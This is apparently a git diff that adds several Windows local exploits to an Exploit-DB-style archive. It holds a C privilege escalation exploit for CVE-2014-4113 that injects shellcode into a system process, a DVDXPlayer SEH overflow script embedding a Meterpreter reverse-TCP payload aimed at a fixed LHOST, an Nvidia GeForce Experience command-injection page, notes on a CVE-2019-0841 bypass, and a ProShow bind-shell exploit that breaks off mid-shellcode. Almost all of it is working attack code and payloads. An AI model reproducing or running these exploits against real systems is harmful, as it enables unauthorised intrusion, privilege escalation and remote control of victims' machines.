+	0x00 ,0x49 ,0x8B ,0xD6 ,0x4C ,0x03 ,0xCF ,0x45 ,0x8B ,0x41 ,0x20 ,0x41 ,0x8B ,0x49 ,0x18 ,0x4C ,
+	0x03 ,0xC7 ,0x48 ,0x85 ,0xC9 ,0x74 ,0x32 ,0x48 ,0xBB ,0x43 ,0x72 ,0x65 ,0x61 ,0x74 ,0x65 ,0x50 ,
+	0x72 ,0x49 ,0xBA ,0x72 ,0x6F ,0x63 ,0x65 ,0x73 ,0x73 ,0x41 ,0x00 ,0x0F ,0x1F ,0x44 ,0x00 ,0x00 ,
+	0x41 ,0x8B ,0x04 ,0x90 ,0x48 ,0x39 ,0x1C ,0x38 ,0x75 ,0x07 ,0x4C ,0x39 ,0x54 ,0x38 ,0x07 ,0x74 ,
+	0x08 ,0x48 ,0xFF ,0xC2 ,0x48 ,0x3B ,0xD1 ,0x72 ,0xE7 ,0x33 ,0xC0 ,0x48 ,0x3B ,0xD1 ,0x0F ,0x83 ,
+	0x92 ,0x00 ,0x00 ,0x00 ,0x41 ,0x8B ,0x49 ,0x24 ,0x45 ,0x33 ,0xC0 ,0x48 ,0x03 ,0xCF ,0x0F ,0xB7 ,
+	0x14 ,0x51 ,0x41 ,0x8B ,0x49 ,0x1C ,0x45 ,0x33 ,0xC9 ,0x48 ,0x03 ,0xCF ,0x44 ,0x8B ,0x14 ,0x91 ,
+	0x48 ,0x89 ,0x44 ,0x24 ,0x58 ,0x48 ,0x89 ,0x44 ,0x24 ,0x60 ,0x4C ,0x03 ,0xD7 ,0x48 ,0x8D ,0x7C ,
+	0x24 ,0x70 ,0xB9 ,0x68 ,0x00 ,0x00 ,0x00 ,0xF3 ,0xAA ,0xB8 ,0x05 ,0x00 ,0x00 ,0x00 ,0x49 ,0x8B ,
+	0xD3 ,0x66 ,0x89 ,0x84 ,0x24 ,0xB0 ,0x00 ,0x00 ,0x00 ,0x48 ,0x8D ,0x44 ,0x24 ,0x50 ,0x33 ,0xC9 ,
+	0x48 ,0x89 ,0x44 ,0x24 ,0x48 ,0x48 ,0x8D ,0x44 ,0x24 ,0x70 ,0x4C ,0x89 ,0x74 ,0x24 ,0x50 ,0x48 ,
+	0x89 ,0x44 ,0x24 ,0x40 ,0x4C ,0x89 ,0x74 ,0x24 ,0x38 ,0x4C ,0x89 ,0x74 ,0x24 ,0x30 ,0xC7 ,0x44 ,
+	0x24 ,0x28 ,0x10 ,0x00 ,0x00 ,0x00 ,0xC7 ,0x44 ,0x24 ,0x70 ,0x68 ,0x00 ,0x00 ,0x00 ,0xC7 ,0x84 ,
+	0x24 ,0xAC ,0x00 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0xC7 ,0x44 ,0x24 ,0x20 ,0x01 ,0x00 ,0x00 ,
+	0x00 ,0x41 ,0xFF ,0xD2 ,0x33 ,0xC0 ,0x4C ,0x8D ,0x9C ,0x24 ,0xE0 ,0x00 ,0x00 ,0x00 ,0x49 ,0x8B ,
+	0x5B ,0x20 ,0x49 ,0x8B ,0x6B ,0x38 ,0x49 ,0x8B ,0xE3 ,0x41 ,0x5E ,0x5F ,0x5E ,0xC3
+};
+
+
+
+
+HMENU __init_menu(
+	)
+{
+	HMENU hMenu_Ret=NULL;
+	MENUITEMINFO mItem={0};
+
+	do 
+	{
+		HMENU hme=CreatePopupMenu();
+		if (hme==NULL){
+			printf("CreatePopupMenu()_1 fail:0x%x\n" ,GetLastError());
+			break;
+		}
+
+		mItem.cbSize=sizeof(MENUITEMINFO);
+		mItem.fMask=(MIIM_STRING);
+
+		bool bisok=InsertMenuItem(hme ,0 ,1 ,&mItem);
+		if (bisok==false){
+			printf("InsertMenuItem()_1 fail:0x%x\n" ,GetLastError());
+			break;
+		}
+
+		hMenu_Ret=CreatePopupMenu();
+		if (hMenu_Ret==NULL){
+			printf("CreatePopupMenu()_2 fail:0x%x\n" ,GetLastError());
+			break;
+		}
+
+		MENUITEMINFO mi={0};
+		mi.cbSize=sizeof(mi);
+		mi.fMask=(MIIM_STRING|MIIM_SUBMENU);
+		mi.hSubMenu=hme;
+		mi.dwTypeData="";
+		mi.cch=1;
+
+		bisok=InsertMenuItem(hMenu_Ret ,0 ,1 ,&mi);
+		if (bisok==false){
+			printf("InsertMenuItem()_2 fail: 0x%x\n" ,GetLastError());
+		}
+
+	} while (false);
+
+	return hMenu_Ret;
+}
+
+
+PVOID __calc_sep_token_addr(
+	)
+{
+	NTSTATUS status;
+	PSYSTEM_HANDLE_INFORMATION handleInfo=NULL;
+	ULONGLONG handleInfoSize = 0x10000 ,i ,ret_obj_addr=NULL; 
+
+	do 
+	{
+		_NtQuerySystemInformation NtQuerySystemInformation = 
+			(_NtQuerySystemInformation)GetProcAddress(LoadLibrary("ntdll.dll"), "NtQuerySystemInformation");
+
+		_NtDuplicateObject NtDuplicateObject =
+			(_NtDuplicateObject)GetProcAddress(LoadLibrary("ntdll.dll"), "NtDuplicateObject");
+
+		_NtQueryObject NtQueryObject =
+			(_NtQueryObject)GetProcAddress(LoadLibrary("ntdll.dll"), "NtQueryObject");
+
+
+		if (!NtQuerySystemInformation || !NtDuplicateObject || !NtQueryObject){
+			printf("get sys proc failed!\n");
+			break;
+		}
+
+		handleInfo = (PSYSTEM_HANDLE_INFORMATION)malloc(handleInfoSize);
+
+		while ((status = NtQuerySystemInformation(SystemHandleInformation,handleInfo,
+			handleInfoSize,NULL)) == STATUS_INFO_LENGTH_MISMATCH)
+			handleInfo = (PSYSTEM_HANDLE_INFORMATION)realloc(handleInfo, handleInfoSize *= 2);
+
+		if (!NT_SUCCESS(status)){
+			printf("NtQuerySystemInformation failed!\n");
+			break;
+		}
+
+
+		POBJECT_TYPE_INFORMATION objectTypeInfo=(POBJECT_TYPE_INFORMATION)malloc(0x1000);
+
+		for (i = 0; i < handleInfo->HandleCount; i++)
+		{
+			SYSTEM_HANDLE handle = handleInfo->Handles[i];
+
+			if (handle.ProcessId != GetCurrentProcessId())
+				continue;
+
+			if (!NT_SUCCESS(NtQueryObject(
+				(HANDLE)handle.Handle,
+				ObjectTypeInformation,
+				objectTypeInfo,
+				0x1000,
+				NULL
+				)))
+			{
+				printf("[%#x] Error!\n", handle.Handle);
+				continue;
+			}
+
+			if (objectTypeInfo->Name.Buffer==NULL || objectTypeInfo->Name.Length==0)
+				continue;
+
+			if (wcscmp(objectTypeInfo->Name.Buffer ,L"Token"))
+				continue;
+
+			ret_obj_addr=((ULONGLONG)handle.Object+0x40);
+		}
+
+		if (objectTypeInfo)
+			free(objectTypeInfo);
+
+		if (handleInfo)
+			free(handleInfo);
+
+	} while (false);
+
+	return (PVOID)ret_obj_addr;
+}
+
+
+ULONGLONG __calc_pid(
+	)
+{
+	NTSTATUS status;
+	PSYSTEM_PROCESS_INFORMATION PsInfo=NULL;
+	ULONGLONG PsInfoSize = 0x10000 ,ret_pid=NULL; 
+
+	do 
+	{
+		_NtQuerySystemInformation NtQuerySystemInformation = 
+			(_NtQuerySystemInformation)GetProcAddress(LoadLibrary("ntdll.dll"), "NtQuerySystemInformation");
+
+
+		if (!NtQuerySystemInformation){
+			printf("get sys proc failed!\n");
+			break;
+		}
+
+		PsInfo = (PSYSTEM_PROCESS_INFORMATION)malloc(PsInfoSize);
+
+		while ((status = NtQuerySystemInformation(SystemProcessesAndThreadsInformation,PsInfo,
+			PsInfoSize ,NULL)) == STATUS_INFO_LENGTH_MISMATCH)
+			PsInfo = (PSYSTEM_PROCESS_INFORMATION)realloc(PsInfo, PsInfoSize*= 2);
+
+		if (!NT_SUCCESS(status)){
+			printf("NtQuerySystemInformation failed!\n");
+			break; 
+		}
+
+		for (;PsInfo->NextEntryDelta ;PsInfo = (PSYSTEM_PROCESS_INFORMATION)((ULONGLONG)PsInfo + PsInfo->NextEntryDelta))
+		{
+			if (PsInfo->ProcessName.Buffer==NULL || PsInfo->ProcessName.Length==0)
+				continue;
+
+			if (!wcscmp(PsInfo->ProcessName.Buffer ,L"winlogon.exe")){
+				ret_pid=PsInfo->InheritedFromProcessId;
+				break;
+			}
+		}
+
+	} while (false);
+
+	return ret_pid;
+} 
+
+
+ULONGLONG __init_fake_wnd_pti(
+	)
+{
+	ULONGLONG ret_pti=NULL;
+	ULONGLONG dst_proc_addr=NULL;
+
+	do 
+	{
+		ret_pti=(ULONGLONG)malloc(0x500);
+		if (ret_pti==NULL){
+			printf("malloc fail!\n");
+			return NULL; 
+		}
+
+		*(ULONGLONG*)(ret_pti+_oft_win32ps_pti)=0;  //Win32Process
+		*(DWORD*)(ret_pti+_oft_0420h_pti)=0;		//not 0x20
+		*(ULONGLONG*)(ret_pti+_oft_list_header_pti)=(ULONGLONG)__calc_sep_token_addr()-0x5;  //TODO:
+
+		void* tmpbuf=malloc(0x100); 
+		memset(tmpbuf ,0 ,0x100);
+		*(ULONGLONG*)(ret_pti+_oft_0188h_pti)=(ULONGLONG)tmpbuf; //buf addr(size >= 0x12) ,check in win32k!SetWakeBit
+
+	} while (false);
+
+	return ret_pti;
+}
+
+
+
+bool __init_fake_tagWnd(
+	)
+{
+	bool bRet=false;
+	_ZwAllocateVirtualMemory_pt pfn_ZwAllocateVm=NULL;
+
+	do 
+	{
+		HMODULE hmd=LoadLibrary("ntdll.dll");
+		if (hmd==NULL)
+			break;
+
+		ULONGLONG fake_tagwnd_pti=__init_fake_wnd_pti();
+		if (fake_tagwnd_pti==NULL){
+			printf("__calc_wnd_pti() fail!\n");
+			break;
+		}
+
+
+		pfn_ZwAllocateVm=(_ZwAllocateVirtualMemory_pt)GetProcAddress(hmd ,"ZwAllocateVirtualMemory");
+		if (pfn_ZwAllocateVm==NULL){
+			printf("pfn ZwAllocateVirtualMemery addr is NULL!\n");
+			break;
+		}
+
+		BYTE* fake_tagWnd_addr=(BYTE*)0xFFFFFFFB; size_t region_size=0x20000;
+		NTSTATUS status=pfn_ZwAllocateVm(GetCurrentProcess() ,(PVOID*)&fake_tagWnd_addr ,0 ,&region_size,
+			MEM_RESERVE | MEM_COMMIT|MEM_TOP_DOWN ,PAGE_EXECUTE_READWRITE);
+
+		if (status < 0){
+			printf("Allocate fake tagWnd fail!\n");
+			break;;
+		}
+
+		ULONGLONG ul_align=0xFFFFFFFBLL-(ULONGLONG)fake_tagWnd_addr;
+		if (ul_align > 0x10000){
+			printf("alloc fake fail: %x!\n" ,fake_tagWnd_addr);
+			break;
+		}
+
+		memset(fake_tagWnd_addr+ul_align ,0 ,0x1000);
+
+		*(ULONGLONG*)(fake_tagWnd_addr+ul_align+_oft_idx_tagWND)=0x0;
+		*(ULONGLONG*)(fake_tagWnd_addr+ul_align+_oft_pti_tagWnd)=fake_tagwnd_pti; //oft 0x170 == win32process
+		*(ULONGLONG*)(fake_tagWnd_addr+ul_align+_oft_18h_tagWnd)=0x0; //0 ,check in IsWindowDesktopComposed
+
+		bRet=true;
+
+	} while (false);
+
+	return bRet;
+}
+
+
+
+LRESULT __stdcall __wh_wnd_proc( 
+	int code, 
+	WPARAM wparam,
+	LPARAM lparam 
+	)
+{
+	do 
+	{
+		CWPSTRUCT* lpm=(CWPSTRUCT*)lparam;
+		if (lpm->message != MN_FINDWINDOWFROMPOINT || g_bis_mn_findwnded==true)
+			break;
+
+		g_bis_mn_findwnded=true;
+
+		UnhookWindowsHook(WH_CALLWNDPROC ,__wh_wnd_proc);
+
+		g_ori_wnd_proc=(WNDPROC)SetWindowLongPtr(lpm->hwnd ,GWLP_WNDPROC ,(LONG_PTR)__wnd_proc_sl);
+
+	} while (false);
+
+	return CallNextHookEx(g_hhk ,code ,wparam ,lparam);
+}
+
+
+
+
+LRESULT __wnd_proc_sl( 
+	HWND hwnd,
+	UINT umsg,
+	WPARAM wparam, 
+	LPARAM lparam
+	)
+{
+	do 
+	{
+		if (umsg != MN_FINDWINDOWFROMPOINT )
+			break;
+
+		if (g_bis_endmenu)
+			break;
+
+		g_bis_endmenu=1;
+
+		EndMenu();
+		return 0xFFFFFFFB;
+
+	} while (false);
+
+	return CallWindowProc(g_ori_wnd_proc ,hwnd ,umsg ,wparam ,lparam);
+}
+
+
+
+LRESULT __stdcall __wnd_proc(
+	HWND hwnd, 
+	UINT umsg, 
+	WPARAM wparam, 
+	LPARAM lparam
+	)
+{
+	if (umsg==WM_ENTERIDLE && g_bis_idled==FALSE)
+	{
+		g_bis_idled=TRUE;
+		PostMessage(hwnd ,WM_KEYFIRST ,0x28 ,0);    
+		PostMessage(hwnd ,WM_KEYFIRST ,0X27 ,0);   
+		PostMessage(hwnd ,WM_LBUTTONDOWN ,0 ,0xff00ff);  
+	}
+
+	return DefWindowProc(hwnd ,umsg ,wparam ,lparam);
+}
+
+
+DWORD __stdcall __thread_plroc( 
+	void*  param
+	)
+{
+	bool bisok=false;
+	WNDCLASS wndcls={0};
+
+	do 
+	{
+		wndcls.lpfnWndProc=__wnd_proc;
+		wndcls.lpszClassName="cve_2014_4113";
+		RegisterClass(&wndcls);
+
+		HWND hwnd=CreateWindowEx(0 ,wndcls.lpszClassName ,NULL ,0 ,0 ,0,
+			200 ,200 ,NULL ,NULL ,NULL ,NULL);
+		if (hwnd==NULL){
+			printf("CreateWindowEx() fail: 0x%x\n" ,GetLastError());
+			break;
+		}
+
+		HMENU hmenu=__init_menu();
+		if (hmenu==NULL){
+			printf("__init_menu() fail: 0x%x\n" ,GetLastError());
+			break;
+		}
+
+		
+		bool bisok=__init_fake_tagWnd();
+		if (bisok==false){
+			printf("__init_fake_tagWnd() fail:0x%x\n" ,GetLastError());
+			break;
+		}
+		
+		g_hhk=SetWindowsHookEx(WH_CALLWNDPROC ,__wh_wnd_proc ,NULL ,GetCurrentThreadId());
+		if (g_hhk==NULL){
+			printf("SetWindowsHookEx() fail:0x%x\n" ,GetLastError());
+			break;
+		}
+
+		bisok=TrackPopupMenu(hmenu ,0 ,0x0FFFFD8F0 ,0x0FFFFD8F0 ,0 ,hwnd ,NULL);
+		if (bisok==false){
+			printf("TrackPopupMenu() fail:0x%x\n" ,GetLastError());
+			break;
+		}
+
+		CloseHandle(hmenu);
+
+		DestroyWindow(hwnd);
+
+	} while (FALSE);
+
+	return 0;
+}
+
+
+
+int main(
+	int argc ,char** argv
+	)
+{
+	bool bisok=false;
+
+	do 
+	{
+		if (argc != 2){
+			printf("usage: xxx fpath");
+			break;
+		}
+
+		HANDLE hProcessToken=NULL ,hRestrictedToken=NULL;
+		if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hProcessToken)) {
+			printf("Could not open process token\n");
+			break; 
+		}
+
+		if (!CreateRestrictedToken(hProcessToken, DISABLE_MAX_PRIVILEGE, 0, 0, 0, 0, 0, 0, &hRestrictedToken)){
+			printf("Could not create restricted token\n");
+			break;
+		}
+
+		if (!AdjustTokenPrivileges(hRestrictedToken, TRUE, NULL, 0, NULL, NULL)) {
+			printf("Could not adjust privileges\n");
+			break;
+		}
+		
+		CloseHandle(hProcessToken);
+
+		HANDLE hthread=CreateThread(NULL ,0 ,__thread_plroc ,NULL ,0 ,NULL);
+		if (hthread==NULL){
+			printf("CreateThread() fail: 0x%x\n" ,GetLastError());
+			break;
+		}
+
+		WaitForSingleObject(hthread ,1000);
+		TerminateThread(hthread ,0);
+		
+		if (!ImpersonateLoggedOnUser(hRestrictedToken)){
+			printf("ImpersonateLoggedOnUser failed!\n");
+			break;
+		}
+		
+		PVOID pfn_cps=GetProcAddress(LoadLibrary("Kernel32.dll") ,"CreateProcessA");
+		if (pfn_cps==NULL){
+			printf("GetProcess CreateProcessA failed!\n");
+			break;
+		}
+		
+		ULONGLONG ul_pid_winlogon=__calc_pid();
+		if (ul_pid_winlogon==NULL){
+			printf("__calc_winlogon_pid failed!\n");
+			break;
+		}
+
+
+		HANDLE hprocess=OpenProcess(PROCESS_ALL_ACCESS ,TRUE ,ul_pid_winlogon);
+		if (hprocess==NULL){
+			printf("OpenProcess failed: %x\n" ,GetLastError());
+			break;
+		}
+
+
+		//init params
+		PVOID params=VirtualAllocEx(hprocess ,NULL ,strlen(argv[1])+10 ,MEM_COMMIT ,PAGE_READWRITE);
+		if (params==NULL){
+			printf("VirtualAllocEx failed:%x\n" ,GetLastError());
+			break;
+		}
+
+		ULONGLONG ul_ret_wrt=0;
+		bisok=WriteProcessMemory(hprocess ,params ,argv[1] ,strlen(argv[1])+2 ,(SIZE_T*)&ul_ret_wrt);
+		if (bisok==false || ul_ret_wrt < strlen(argv[1])+2){
+			printf("WriteProcessMemory() failed!\n");
+			break;
+		} 
+
+
+		//init shellcode
+
+		PVOID shellcode=VirtualAllocEx(hprocess ,NULL ,0x220 ,MEM_COMMIT ,PAGE_EXECUTE_READWRITE);
+		if (shellcode==NULL){
+			printf("VirtualAllocEx failed:%x\n" ,GetLastError());
+			break;
+		}
+
+		bisok=WriteProcessMemory(hprocess ,shellcode ,__s_code ,sizeof(__s_code) ,(SIZE_T*)&ul_ret_wrt);
+		if (bisok==false || ul_ret_wrt < sizeof(__s_code)){
+			printf("WriteProcessMemory() failed!\n");
+			break;
+		}
+
+		DWORD dw_tid=0;
+		HANDLE htd_rmt=CreateRemoteThread(hprocess ,NULL ,0 ,(LPTHREAD_START_ROUTINE )shellcode ,params ,0 ,&dw_tid);
+		if (htd_rmt==NULL){
+			printf("CreateRemoteThread() fail!\n");
+			break;
+		}
+
+
+		//clear
+
+		CloseHandle(htd_rmt);
+
+		CloseHandle(hprocess);
+
+		CloseHandle(hRestrictedToken);
+
+	} while (false);
+	
+	return 0;
+}
\ No newline at end of file
diff --git a/exploits/windows/local/46962.py b/exploits/windows/local/46962.py
new file mode 100755
index 000000000..864be5c18
--- /dev/null
+++ b/exploits/windows/local/46962.py
@@ -0,0 +1,58 @@
+# Exploit Title: DVDXPlayer 5.5 Pro Local Buffer Overflow with SEH
+# Date: 6-3-2019
+# Exploit Author: Kevin Randall
+# Vendor Homepage: http://www.dvd-x-player.com/download.html#dvdPlayer
+# Software Link: http://www.dvd-x-player.com/download.html#dvdPlayer
+# Version: 5.5 Pro
+# Tested on: Windows 7
+# CVE : N/A
+
+#!/usr/bin/python
+###########Create Shellcode with MSFVenom###############################################################################################
+##msfvenom shellcode generate: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.9 LPORT=4444 -b '\x00\x0A\x0D\x1A' -f python
+########################################################################################################################################
+file_name = "payloadofficial.plf"
+
+#######################Copy and Paste Shellcode Here!!###########################
+buf =  ""
+buf += "\xd9\xe8\xb8\xa0\x7e\x18\xef\xd9\x74\x24\xf4\x5f\x2b"
+buf += "\xc9\xb1\x56\x31\x47\x18\x83\xef\xfc\x03\x47\xb4\x9c"
+buf += "\xed\x13\x5c\xe2\x0e\xec\x9c\x83\x87\x09\xad\x83\xfc"
+buf += "\x5a\x9d\x33\x76\x0e\x11\xbf\xda\xbb\xa2\xcd\xf2\xcc"
+buf += "\x03\x7b\x25\xe2\x94\xd0\x15\x65\x16\x2b\x4a\x45\x27"
+buf += "\xe4\x9f\x84\x60\x19\x6d\xd4\x39\x55\xc0\xc9\x4e\x23"
+buf += "\xd9\x62\x1c\xa5\x59\x96\xd4\xc4\x48\x09\x6f\x9f\x4a"
+buf += "\xab\xbc\xab\xc2\xb3\xa1\x96\x9d\x48\x11\x6c\x1c\x99"
+buf += "\x68\x8d\xb3\xe4\x45\x7c\xcd\x21\x61\x9f\xb8\x5b\x92"
+buf += "\x22\xbb\x9f\xe9\xf8\x4e\x04\x49\x8a\xe9\xe0\x68\x5f"
+buf += "\x6f\x62\x66\x14\xfb\x2c\x6a\xab\x28\x47\x96\x20\xcf"
+buf += "\x88\x1f\x72\xf4\x0c\x44\x20\x95\x15\x20\x87\xaa\x46"
+buf += "\x8b\x78\x0f\x0c\x21\x6c\x22\x4f\x2d\x41\x0f\x70\xad"
+buf += "\xcd\x18\x03\x9f\x52\xb3\x8b\x93\x1b\x1d\x4b\xa2\x0c"
+buf += "\x9e\x83\x0c\x5c\x60\x24\x6c\x74\xa7\x70\x3c\xee\x0e"
+buf += "\xf9\xd7\xee\xaf\x2c\x4d\xe5\x27\x0f\x39\xf9\xbe\xe7"
+buf += "\x3b\xfa\xd1\xab\xb2\x1c\x81\x03\x94\xb0\x62\xf4\x54"
+buf += "\x61\x0b\x1e\x5b\x5e\x2b\x21\xb6\xf7\xc6\xce\x6e\xaf"
+buf += "\x7e\x76\x2b\x3b\x1e\x77\xe6\x41\x20\xf3\x02\xb5\xef"
+buf += "\xf4\x67\xa5\x18\x63\x87\x35\xd9\x06\x87\x5f\xdd\x80"
+buf += "\xd0\xf7\xdf\xf5\x16\x58\x1f\xd0\x25\x9f\xdf\xa5\x1f"
+buf += "\xeb\xd6\x33\x1f\x83\x16\xd4\x9f\x53\x41\xbe\x9f\x3b"
+buf += "\x35\x9a\xcc\x5e\x3a\x37\x61\xf3\xaf\xb8\xd3\xa7\x78"
+buf += "\xd1\xd9\x9e\x4f\x7e\x22\xf5\xd3\x79\xdc\x8b\xfb\x21"
+buf += "\xb4\x73\xbc\xd1\x44\x1e\x3c\x82\x2c\xd5\x13\x2d\x9c"
+buf += "\x16\xbe\x66\xb4\x9d\x2f\xc4\x25\xa1\x65\x88\xfb\xa2"
+buf += "\x8a\x11\x0c\xd8\xe3\xa6\xed\x1d\xea\xc2\xee\x1d\x12"
+buf += "\xf5\xd3\xcb\x2b\x83\x12\xc8\x0f\x9c\x21\x6d\x39\x37"
+buf += "\x49\x21\x39\x12"
+#################################################################################
+
+#No Operations#
+nops = "\x90"*20
+shellcode = nops + buf
+
+####Where all the magic happens! :)#####################################################################
+buffer = "A"* 608 + "\xEB\x06\x90\x90" + "\x2E\x17\x64\x61" + shellcode + "D"*(1384-len(shellcode))
+###################################################################################################
+plf_file = open(file_name,"w")
+plf_file.write(buffer)
+plf_file.close()
\ No newline at end of file
diff --git a/exploits/windows/local/46972.html b/exploits/windows/local/46972.html
new file mode 100644
index 000000000..1d895bef9
--- /dev/null
+++ b/exploits/windows/local/46972.html
@@ -0,0 +1,66 @@
+<!-- 
+POC for CVE‑2019‑5678 Nvidia GeForce Experience OS command injection via a web browser
+Author: David Yesland -- Rhino Security Labs
+ -->
+<html>
+   <head>
+      <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
+   </head>
+   <body>
+      <script>
+         //Send request to local GFE server
+          function submitRequest(port,secret)
+          {
+           var xhr = new XMLHttpRequest();
+           xhr.open("POST", "http:\/\/127.0.0.1:"+port+"\/gfeupdate\/autoGFEInstall\/", true);
+           xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
+           xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+           xhr.setRequestHeader("Content-Type", "text\/html");
+          xhr.setRequestHeader("X_LOCAL_SECURITY_COOKIE", secret);
+           var body = "\""+document.getElementById("cmd").value+"\"";
+          var aBody = new Uint8Array(body.length);
+           for (var i = 0; i < aBody.length; i++)
+             aBody[i] = body.charCodeAt(i); 
+           xhr.send(new Blob([aBody]));
+          }
+          
+          $(document).on('change', '.file-upload-button', function(event) {
+          var reader = new FileReader();
+          
+          reader.onload = function(event) {
+          var jsonObj = JSON.parse(event.target.result);
+          submitRequest(jsonObj.port,jsonObj.secret);
+          }
+          
+          reader.readAsText(event.target.files[0]);
+          });
+          
+          //Copy text from some text field
+          function myFunction() {
+          var copyText = document.getElementById("myInput");
+          copyText.select();
+          document.execCommand("copy");
+          
+          }
+          
+          //trigger the copy and file window on ctrl press
+          $(document).keydown(function(keyPressed) {
+          if (keyPressed.keyCode == 17) {
+          myFunction();document.getElementById('file-input').click();
+          }
+          });
+      </script>
+      <h2>
+         Press CTRL+V+Enter
+      </h2>
+      <!--Command to run in a hidden input field-->
+      <input type="hidden" value="calc.exe" id="cmd" size="55">
+      <!--Hidden text box to copy text from-->
+      <div style="opacity: 0.0;">
+         <input type="text" value="%LOCALAPPDATA%\NVIDIA Corporation\NvNode\nodejs.json"
+            id="myInput" size="1">
+      </div>
+      <!--file input-->
+      <input id="file-input" onchange="file_changed(this)" onclick="this.value=null;" accept="application/json" class='file-upload-button' type="file" name="name" style="display: none;" />
+   </body>
+</html>
\ No newline at end of file
diff --git a/exploits/windows/local/46976.txt b/exploits/windows/local/46976.txt
new file mode 100644
index 000000000..990731c78
--- /dev/null
+++ b/exploits/windows/local/46976.txt
@@ -0,0 +1,34 @@
+CVE-2019-0841 BYPASS #2
+
+There is a second bypass for CVE-2019-0841.
+
+This can be triggered as following:
+
+Delete all files and subfolders within "c:\users\%username%\appdata\local\packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\" (atleast the ones we can delete as user)
+
+Try to launch edge. It will crash the first time.
+
+When we launch it a second time, it will write the DACL while impersonating "SYSTEM".
+
+The trick here is to launch edge by clicking it on the taskbar or desktop, using "start microsoft-edge:" seems to result in correct impersonation.
+
+You can still do this completely programmatically.. since edge will always be in the same position in the task bar.. *cough* sendinput *cough*. There is probably other ways too.
+
+Another note, this bug is most definitely not restricted to edge. This will be triggered with other packages too. So you can definitely figure out a way to trigger this bug silently without having edge pop up. Or you could probably minimize edge as soon as it launches and close it as soon as the bug completes. I think it will also trigger by just launching edge once, but sometimes you may have to wait a little. I didn't do extensive testing.. found this bug and quickly wrote up a poc, took me like 2 hours total, finding LPEs is easy.
+
+To repro:
+1. Launch my poc
+2. Launch edge several times
+
+Use video demo as guidance. Also, I don't get paid for dropping bugs, so if you want a simple and full exploit, then go fucking write it yourself, I have better things to do, such as preparing my voyage into the arctic. You're welcome.
+
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!IMPORTANT!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+
+Make sure you have multiple cores in your VM (not multiple processors, multiple cores).
+
+It's going to increase the thread priority to increase our odds of winning the race condition that this exploits. If your VM freezes it means you either have 1 core or set your vm to have multiple processors instead of multiple cores... which will also cause it to lock up.
+
+
+
+
+EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46976.zip
\ No newline at end of file
diff --git a/exploits/windows/local/46980.py b/exploits/windows/local/46980.py
new file mode 100755
index 000000000..451027015
--- /dev/null
+++ b/exploits/windows/local/46980.py
@@ -0,0 +1,99 @@
+#!/usr/bin/python
+# _*_ coding:utf-8 _*_
+
+# Exploit Title: ProShow v9.0.3797 Local Exploit
+# Exploit Author: @Yonatan_Correa
+# website with details: https://risataim.blogspot.com/2019/06/exploit-local-para-proshow.html
+# Vendor Homepage: http://www.photodex.com/ProShow
+# Software Link: http://files.photodex.com/release/pspro_90_3797.exe
+# Version: v9.0.3797
+# Tested on: Wind 7
+
+from struct import pack
+
+informacion = """
+
+	ProShow v9.0.3797
+	http://www.photodex.com/ProShow
+
+
+	execute exploit
+	create a file called "load"
+	copy load "C:\Program Files\Photodex\ProShow Producer\"
+	"C:\Program Files\Photodex\ProShow Producer\proshow.exe"
+	And connect nc -nv IP_Host 4444
+
+	Testing: Windows 7
+	@Yonatan_Correa
+	https://risataim.blogspot.com/2019/06/exploit-local-para-proshow.html
+"""
+
+
+# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp -e x86/alpha_mixed LPORT=4444 EXITFUNC=seh -f c
+# Payload size: 717 bytes
+shell = "yonayona" + ("\x89\xe5\xda\xc2\xd9\x75\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
+"\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59\x6a\x41"
+"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
+"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x6b"
+"\x4c\x59\x78\x4f\x72\x57\x70\x65\x50\x45\x50\x53\x50\x6d\x59"
+"\x39\x75\x75\x61\x4f\x30\x45\x34\x6c\x4b\x30\x50\x66\x50\x6e"
+"\x6b\x30\x52\x74\x4c\x6e\x6b\x36\x32\x77\x64\x6c\x4b\x72\x52"
+"\x36\x48\x66\x6f\x4c\x77\x42\x6a\x46\x46\x75\x61\x79\x6f\x4e"
+"\x4c\x55\x6c\x50\x61\x51\x6c\x55\x52\x64\x6c\x77\x50\x79\x51"
+"\x38\x4f\x36\x6d\x53\x31\x79\x57\x4a\x42\x49\x62\x42\x72\x42"
+"\x77\x4e\x6b\x32\x72\x64\x50\x4e\x6b\x71\x5a\x55\x6c\x4c\x4b"
+"\x32\x6c\x37\x61\x31\x68\x79\x73\x43\x78\x67\x71\x58\x51\x52"
+"\x71\x4c\x4b\x51\x49\x65\x70\x43\x31\x68\x53\x4c\x4b\x70\x49"
+"\x42\x38\x4a\x43\x47\x4a\x71\x59\x6c\x4b\x76\x54\x6e\x6b\x53"
+"\x31\x4e\x36\x64\x71\x79\x6f\x4c\x6c\x69\x51\x38\x4f\x66\x6d"
+"\x67\x71\x48\x47\x56\x58\x6d\x30\x64\x35\x38\x76\x65\x53\x53"
+"\x4d\x59\x68\x35\x6b\x73\x4d\x65\x74\x54\x35\x58\x64\x72\x78"
+"\x4c\x4b\x52\x78\x46\x44\x76\x61\x58\x53\x35\x36\x4c\x4b\x56"
+"\x6c\x50\x4b\x4e\x6b\x30\x58\x57\x6c\x57\x71\x49\x43\x4e\x6b"
+"\x75\x54\x4e\x6b\x56\x61\x48\x50\x4f\x79\x42\x64\x75\x74\x64"
+"\x64\x61\x4b\x43\x6b\x33\x51\x43\x69\x50\x5a\x73\x61\x69\x6f"
+"\x6b\x50\x63\x6f\x53\x6f\x32\x7a\x6c\x4b\x47\x62\x5a\x4b\x4c"
+"\x4d\x71\x4d\x43\x58\x70\x33\x77\x42\x35\x50\x53\x30\x35\x38"
